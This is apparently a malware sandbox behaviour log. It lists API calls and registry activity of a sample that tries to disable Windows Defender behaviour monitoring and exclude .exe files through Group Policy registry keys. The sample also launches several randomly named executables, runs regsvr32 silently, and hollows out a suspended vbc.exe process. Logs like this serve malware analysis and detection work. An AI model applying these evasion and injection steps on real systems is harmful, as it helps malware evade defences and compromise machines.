description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2744
thread_handle: 0x0000000000000934
process_identifier: 2740
current_directory: C:\Users\test22\Pictures\Minor Policy
filepath: C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe
track: 1
command_line: "C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe"
filepath_r: C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000930
1 1 0

CreateProcessInternalW

thread_identifier: 2736
thread_handle: 0x0000000000000920
process_identifier: 2732
current_directory: C:\Users\test22\Pictures\Minor Policy
filepath: C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe
track: 1
command_line: "C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe"
filepath_r: C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000928
1 1 0

CreateProcessInternalW

thread_identifier: 2752
thread_handle: 0x00000000000008f8
process_identifier: 2748
current_directory: C:\Users\test22\Pictures\Minor Policy
filepath: C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe
track: 1
command_line: "C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe"
filepath_r: C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000908
1 1 0

CreateProcessInternalW

thread_identifier: 2896
thread_handle: 0x0000000000000bac
process_identifier: 2892
current_directory: C:\Users\test22\Pictures\Minor Policy
filepath: C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe
track: 1
command_line: "C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe"
filepath_r: C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000bdc
1 1 0

CreateProcessInternalW

thread_identifier: 2920
thread_handle: 0x000000000000099c
process_identifier: 2916
current_directory: C:\Users\test22\Pictures\Minor Policy
filepath: C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe
track: 1
command_line: "C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe"
filepath_r: C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000bfc
1 1 0

CreateProcessInternalW

thread_identifier: 2936
thread_handle: 0x0000000000000c2c
process_identifier: 2932
current_directory: C:\Users\test22\Pictures\Minor Policy
filepath: C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe
track: 1
command_line: "C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe"
filepath_r: C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000009b0
1 1 0

CreateProcessInternalW

thread_identifier: 2928
thread_handle: 0x0000000000000c14
process_identifier: 2924
current_directory: C:\Users\test22\Pictures\Minor Policy
filepath: C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe
track: 1
command_line: "C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe"
filepath_r: C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000c18
1 1 0

CreateProcessInternalW

thread_identifier: 2972
thread_handle: 0x0000000000000750
process_identifier: 2968
current_directory: C:\Users\test22\Pictures\Minor Policy
filepath: C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe
track: 1
command_line: "C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe"
filepath_r: C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000578
1 1 0

NtResumeThread

thread_handle: 0x00000000000001ec
suspend_count: 1
process_identifier: 2740
1 0 0

NtResumeThread

thread_handle: 0x00000258
suspend_count: 1
process_identifier: 2732
1 0 0

CreateProcessInternalW

thread_identifier: 2180
thread_handle: 0x000002a4
process_identifier: 2140
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\regsvr32.exe
track: 1
command_line: "C:\Windows\System32\regsvr32.exe" -s F652w.85
filepath_r: C:\Windows\System32\regsvr32.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002a0
1 1 0

NtResumeThread

thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 2140
1 0 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2916
1 0 0

NtResumeThread

thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 2916
1 0 0

NtResumeThread

thread_handle: 0x000001d0
suspend_count: 1
process_identifier: 2916
1 0 0

NtResumeThread

thread_handle: 0x000001d4
suspend_count: 1
process_identifier: 2916
1 0 0

NtResumeThread

thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 2916
1 0 0

NtResumeThread

thread_handle: 0x00000304
suspend_count: 1
process_identifier: 2916
1 0 0

NtResumeThread

thread_handle: 0x0000037c
suspend_count: 1
process_identifier: 2916
1 0 0

NtResumeThread

thread_handle: 0x000003b8
suspend_count: 1
process_identifier: 2916
1 0 0

CreateProcessInternalW

thread_identifier: 748
thread_handle: 0x00000048
process_identifier: 1960
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000004c
1 1 0

NtGetContextThread

thread_handle: 0x00000048
1 0 0

NtAllocateVirtualMemory

process_identifier: 1960
region_size: 368640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000004c
1 0 0

WriteProcessMemory

buffer:
base_address: 0x00400000
process_identifier: 1960
process_handle: 0x0000004c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 1960
process_handle: 0x0000004c
1 1 0

NtSetContextThread

registers.eip: 2005598660
registers.esp: 6618964
registers.edi: 0
registers.eax: 4510638
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000048
process_identifier: 1960
1 0 0

NtResumeThread

thread_handle: 0x00000048
suspend_count: 1
process_identifier: 1960
1 0 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2924
1 0 0

NtResumeThread

thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 2924
1 0 0

NtResumeThread

thread_handle: 0x00000188
suspend_count: 1
process_identifier: 2924
1 0 0

NtResumeThread

thread_handle: 0x000001c8
suspend_count: 1
process_identifier: 2924
1 0 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x000001c8
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x00000250
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 1960
1 0 0

NtResumeThread

thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 1960
1 0 0

NtResumeThread

thread_handle: 0x00000198
suspend_count: 1
process_identifier: 1960
1 0 0

NtResumeThread

thread_handle: 0x0000020c
suspend_count: 1
process_identifier: 1960
1 0 0

NtResumeThread

thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 1960
1 0 0

NtResumeThread

thread_handle: 0x00000308
suspend_count: 1
process_identifier: 1960
1 0 0

NtResumeThread

thread_handle: 0x000003a0
suspend_count: 1
process_identifier: 1960
1 0 0

NtResumeThread

thread_handle: 0x000003d8
suspend_count: 1
process_identifier: 1960
1 0 0

NtResumeThread

thread_handle: 0x00000390
suspend_count: 1
process_identifier: 1960
1 0 0